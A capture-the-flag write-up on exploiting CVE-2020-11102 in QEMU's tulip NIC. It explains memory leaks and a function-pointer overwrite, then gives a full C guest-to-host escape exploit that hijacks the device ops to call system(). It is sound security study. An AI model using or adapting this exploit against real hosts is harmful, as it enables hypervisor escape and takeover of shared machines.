CVE-2020-11102: Escape from the Earth
Introduction
I participated in the Aliyun CTF competition recently and solved an interesting challenge based on CVE-2020-11102, which is a vulnerability in QEMU that allows a guest OS to escape and execute arbitrary code on the host OS. In this article, I would like to share some details about the challenge and what I learned from it.
The vulnerability
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static void tulip_copy_tx_buffers (TULIPState *s, struct tulip_descriptor *desc) { int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK; int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK; if (len1) { pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); s->tx_frame_len += len1; } if (len2) { pci_dma_read(&s->dev, desc->buf_addr2, s->tx_frame + s->tx_frame_len, len2); s->tx_frame_len += len2; } desc->status = (len1 + len2) ? 0 : 0x7fffffff ; }
Take a look at tulip_copy_tx_buffers()
first. It copies the guest buffer at desc->buf_addr1
to s->tx_frame + s->tx_frame_len
. Notice that there is no check for the s->tx_frame_len
as well as the len1
. And s->tx_frame_len
will be increased by len1
after copying. When we call this function multiple times, the s->tx_frame_len
can be increased to a very large value, which can cause a buffer overflow.
The same applies to tulip_copy_rx_bytes()
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 static void tulip_copy_rx_bytes (TULIPState *s, struct tulip_descriptor *desc) { int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK; int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK; int len; if (s->rx_frame_len && len1) { if (s->rx_frame_len > len1) { len = len1; } else { len = s->rx_frame_len; } pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len); s->rx_frame_len -= len; } if (s->rx_frame_len && len2) { if (s->rx_frame_len > len2) { len = len2; } else { len = s->rx_frame_len; } pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len); s->rx_frame_len -= len; } }
The tulip_copy_rx_bytes()
function copies the s->rx_frame
to the desc->buf_addr1
. And there is no check for the s->rx_frame_len
and s->rx_frame_size
. This results in possible memory disclosure.
Exploitation
Leak something first
To leak QEMU base address and heap address we need to control s->rx_frame_size
and s->rx_frame_len
. Consider the following code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 typedef struct TULIPState { PCIDevice dev; MemoryRegion io; MemoryRegion memory; NICConf c; qemu_irq irq; NICState *nic; eeprom_t *eeprom; uint32_t csr[16 ]; uint32_t old_csr9; uint32_t mii_word; uint32_t mii_bitcnt; hwaddr current_rx_desc; hwaddr current_tx_desc; uint8_t rx_frame[2048 ]; uint8_t tx_frame[2048 ]; int tx_frame_len; int rx_frame_len; int rx_frame_size; uint32_t rx_status; uint8_t filter[16 ][6 ]; } TULIPState;
The tx_frame
is a fixed size buffer, which is 2048 bytes. By triggering tulip_copy_tx_buffers()
multiple times, we can control tx_frame_len
, rx_frame_len
and rx_frame_size
. Then we can call tulip_copy_rx_bytes()
and copy the heap memory back to the user space of the guest OS. With some calculation, we can retrieve the QEMU base address and heap address very easily.
After leaking the memory, we need to figure out how to get arbitrary code execution within the context of QEMU. This piece of code caught my attention:
1 2 3 4 5 6 7 8 9 static const MemoryRegionOps tulip_ops = { .read = tulip_read, .write = tulip_write, .endianness = DEVICE_LITTLE_ENDIAN, .impl = { .min_access_size = 4 , .max_access_size = 4 , }, };
What if we can control the function pointer in tulip_ops
? Unfortunately, the tulip_ops
is not writable.
When initializing the memory region of TULIPState
, the pointer to tulip_ops
will be assigned to struct MemoryRegion.ops
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 memory_region_init_io(&s->io, OBJECT(&s->dev), &tulip_ops, s, "tulip-io" , 128 ); memory_region_init_io(&s->memory, OBJECT(&s->dev), &tulip_ops, s, "tulip-mem" , 128 ); struct MemoryRegion { Object parent_obj; bool romd_mode; bool ram; bool subpage; bool readonly; bool nonvolatile; bool rom_device; bool flush_coalesced_mmio; bool global_locking; uint8_t dirty_log_mask; bool is_iommu; RAMBlock *ram_block; Object *owner; const MemoryRegionOps *ops; void *opaque; MemoryRegion *container; Int128 size; hwaddr addr; void (*destructor)(MemoryRegion *mr); uint64_t align; bool terminates; bool ram_device; bool enabled; bool warning_printed; uint8_t vga_logging_count; MemoryRegion *alias; hwaddr alias_offset; int32_t priority; QTAILQ_HEAD(, MemoryRegion) subregions; QTAILQ_ENTRY(MemoryRegion) subregions_link; QTAILQ_HEAD(, CoalescedMemoryRange) coalesced; const char *name; unsigned ioeventfd_nb; MemoryRegionIoeventfd *ioeventfds; };
And struct MemoryRegion
is allocated on the heap. So we can overwrite the struct MemoryRegion.ops
with the address of tx_frame
and craft a fake struct MemoryRegionOps
.
Also, notice that the type of tx_frame_len
, rx_frame_len
and rx_frame_size
are all int
, which means we can write backward if we overwrite these fields with negative value.
Exploitation
The exploitation should be pretty straightforward and the comments in the code should be self-explanatory.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 #include <stdio.h> #include <string.h> #include <stdint.h> #include <stdlib.h> #include <fcntl.h> #include <assert.h> #include <inttypes.h> #include <sys/io.h> #define PAGE_SHIFT 12 #define PAGE_SIZE (1 << PAGE_SHIFT) #define PFN_PRESENT (1ull << 63) #define PFN_PFN ((1ull << 55) - 1) #define PMIO_BASE 0x000000000000c000 #define CSR(_x) ((_x) << 3) #define CSR5_TS_SUSPENDED 6 #if 0 tulip_write -> tulip_xmit_list_update -> tulip_copy_tx_buffers -> pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); -> static uint32_t tulip_ts (TULIPState *s) { return (s->csr[5 ] >> CSR5_TS_SHIFT) & CSR5_TS_MASK; } #endif struct tulip_descriptor { uint32_t status; 
uint32_t control; uint32_t buf_addr1; uint32_t buf_addr2; }; int fd;uint32_t page_offset (uint32_t addr) { return addr & ((1 << PAGE_SHIFT) - 1 ); } uint64_t gva_to_gfn (void *addr) { uint64_t pme, gfn; size_t offset; offset = ((uintptr_t )addr >> 9 ) & ~7 ; lseek(fd, offset, SEEK_SET); read(fd, &pme, 8 ); if (!(pme & PFN_PRESENT)) return -1 ; gfn = pme & PFN_PFN; return gfn; } uint64_t gva_to_gpa (void *addr) { uint64_t gfn = gva_to_gfn(addr); assert(gfn != -1 ); return (gfn << PAGE_SHIFT) | page_offset((uint64_t )addr); } uint64_t pmio_read (uint64_t port) { uint64_t val; val = inw(PMIO_BASE + port); return val; } void pmio_write (uint64_t port, uint64_t val) { outw(val, PMIO_BASE + port); } void pmio_writel (uint64_t port, uint64_t val) { outl(val, PMIO_BASE + port); } int main (int argc, char **argv) { printf ("[*] enter stage1\n" ); int ret = 0 ; fd = open("/proc/self/pagemap" , O_RDONLY); if (fd < 0 ) { perror("open" ); exit (1 ); } iopl(3 ); struct tulip_descriptor *tx_desc = malloc (sizeof (struct tulip_descriptor)); struct tulip_descriptor *rx_desc = malloc (sizeof (struct tulip_descriptor)); char *recv_buf = malloc (0x9000 ); char *buf = malloc (0x1000 ); memset (buf, 'A' , 0x1000 ); memset (recv_buf, 'B' , 0x9000 ); int len1 = 0x400 << 0 ; int len2 = 0 << 11 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 29 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; printf ("[*] desc: 0x%x\n" , tx_desc->buf_addr1); uint64_t tx_desc_gpa = gva_to_gpa(tx_desc); printf ("[*] tx_desc_gpa: 0x%lx\n" , tx_desc_gpa); pmio_writel(CSR(6 ), 1u << 13 ); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] fill tx_frame\n" ); sleep(1 ); tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] clean CSR5\n" ); pmio_writel(CSR(5 ), 0xffffffff ); 
struct oob_data { int tx_frame_len; int rx_frame_len; int rx_frame_size; uint32_t rx_status; uint8_t filter[16 ][6 ]; }; len1 = sizeof (struct oob_data); struct oob_data *oob_data = malloc (sizeof (struct oob_data)); oob_data->tx_frame_len = 0x400 - len1; oob_data->rx_frame_len = 0x900 ; oob_data->rx_frame_size = 2048 *2 + 0x900 ; for (int i = 0 ; i < 16 ; i++) { oob_data->filter[i][0 ] = 'A' ; oob_data->filter[i][1 ] = 'A' ; oob_data->filter[i][2 ] = 'A' ; oob_data->filter[i][3 ] = 'A' ; oob_data->filter[i][4 ] = 'A' ; oob_data->filter[i][5 ] = 'A' ; } tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(oob_data); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ) | (1UL << 30 ); pmio_write(CSR(6 ), 0x800 | (1u << 13 ) | (1UL << 1 )); sleep(1 ); printf ("[*] OOB write tx_frame_len...\n" ); int rx_len1, rx_len2; rx_len1 = 0x400 ; rx_len2 = 0 ; rx_desc->status = (1UL << 31 ) | (1UL << 24 ); rx_desc->buf_addr1 = gva_to_gpa(recv_buf); rx_desc->buf_addr2 = 0x180 ; rx_desc->control = rx_len2 | rx_len1 | (1UL << 24 ) | (1UL << 30 ); sleep(1 ); uint64_t rx_desc_gpa = gva_to_gpa(rx_desc); printf ("[*] rx_desc_gpa: 0x%lx\n" , rx_desc_gpa); pmio_writel(CSR(3 ), rx_desc_gpa); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[+] leak\n" ); char *cur = (char *)recv_buf; for (int i = 0 ; i < 50 ; ++i) { printf ("0x%016lx 0x%016lx\n" , *(size_t *)cur, *(size_t *)(cur+8 )); cur += 16 ; } cur = (char *)recv_buf; uint64_t qemu_base = ((uint64_t *)cur)[0x1d ] - 0x755f9f ; uint64_t heap_base = ((uint64_t *)cur)[22 ] - 0xe11380 ; uint64_t qemu_plt_system = qemu_base+2859620 ; uint64_t frame_base = heap_base+0xe0fcf0 ; printf ("[*] continue...\n" ); printf ("[+] qemu_base: 0x%lx\n" , qemu_base); printf ("[+] heap_base: 0x%lx\n" , heap_base); printf ("[*] enter stage2\n" ); { len1 = 0x400 << 0 ; len2 = 0 << 11 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 29 ) | (1UL << 24 ); 
tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; printf ("[*] desc: 0x%x\n" , tx_desc->buf_addr1); uint64_t tx_desc_gpa = gva_to_gpa(tx_desc); printf ("[*] tx_desc_gpa: 0x%lx\n" , tx_desc_gpa); pmio_writel(CSR(6 ), 1u << 13 ); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] fill tx_frame\n" ); sleep(1 ); tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] clean CSR5\n" ); pmio_writel(CSR(5 ), 0xffffffff ); len1 = sizeof (struct oob_data); struct oob_data *oob_data = malloc (sizeof (struct oob_data)); oob_data->tx_frame_len = -0x3350 - 0x70 ; oob_data->rx_frame_len = 0 ; oob_data->rx_frame_size = 0 ; for (int i = 0 ; i < 16 ; i++) { oob_data->filter[i][0 ] = 0xff ; oob_data->filter[i][1 ] = 0xff ; oob_data->filter[i][2 ] = 0xff ; oob_data->filter[i][3 ] = 0xff ; oob_data->filter[i][4 ] = 0xff ; oob_data->filter[i][5 ] = 0xff ; } tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(oob_data); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ); pmio_write(CSR(6 ), 0x800 | (1u << 13 ) | (1UL << 1 )); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); sleep(1 ); uint64_t *binsh = (uint64_t *)malloc (0x200 ); binsh[0 ] = 7449354444534473059 ; binsh[1 ] = 0 ; len1 = 16 ; len2 = 0 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(binsh); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ); pmio_writel(CSR(4 ), tx_desc_gpa); } printf ("[*] enter stage3\n" ); { ((uint64_t *)buf)[0 ] = qemu_plt_system; ((uint64_t *)buf)[1 ] = qemu_plt_system; ((uint64_t *)buf)[2 ] = 0 ; ((uint64_t *)buf)[3 ] = 0 ; ((uint64_t *)buf)[4 ] = 2 ; ((uint64_t *)buf)[5 ] = 0 ; ((uint64_t *)buf)[6 ] = 0 ; ((uint64_t *)buf)[7 ] = 0 ; ((uint64_t *)buf)[8 ] = 0x0000000400000004 ; ((uint64_t *)buf)[9 ] = 0 ; ((uint64_t 
*)buf)[10 ] = 0 ; ((uint64_t *)buf)[11 ] = 0 ; len1 = 0x400 << 0 ; len2 = 0 << 11 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 29 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; printf ("[*] desc: 0x%x\n" , tx_desc->buf_addr1); uint64_t tx_desc_gpa = gva_to_gpa(tx_desc); printf ("[*] tx_desc_gpa: 0x%lx\n" , tx_desc_gpa); pmio_writel(CSR(6 ), 1u << 13 ); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] fill tx_frame\n" ); sleep(1 ); tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] clean CSR5\n" ); pmio_writel(CSR(5 ), 0xffffffff ); len1 = sizeof (struct oob_data); struct oob_data *oob_data = malloc (sizeof (struct oob_data)); oob_data->tx_frame_len = -0x2a28 -0x70 ; oob_data->rx_frame_len = 0 ; oob_data->rx_frame_size = 0 ; for (int i = 0 ; i < 16 ; i++) { oob_data->filter[i][0 ] = 0xff ; oob_data->filter[i][1 ] = 0xff ; oob_data->filter[i][2 ] = 0xff ; oob_data->filter[i][3 ] = 0xff ; oob_data->filter[i][4 ] = 0xff ; oob_data->filter[i][5 ] = 0xff ; } tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(oob_data); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); sleep(1 ); printf ("[*] hijack ops\n" ); uint64_t *fake_memory_region_ops = (uint64_t *)malloc (0x200 ); fake_memory_region_ops[0 ] = frame_base; len1 = 8 ; len2 = 0 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ); pmio_writel(CSR(4 ), tx_desc_gpa); pmio_writel(CSR(4 ), tx_desc_gpa); } return 0 ; }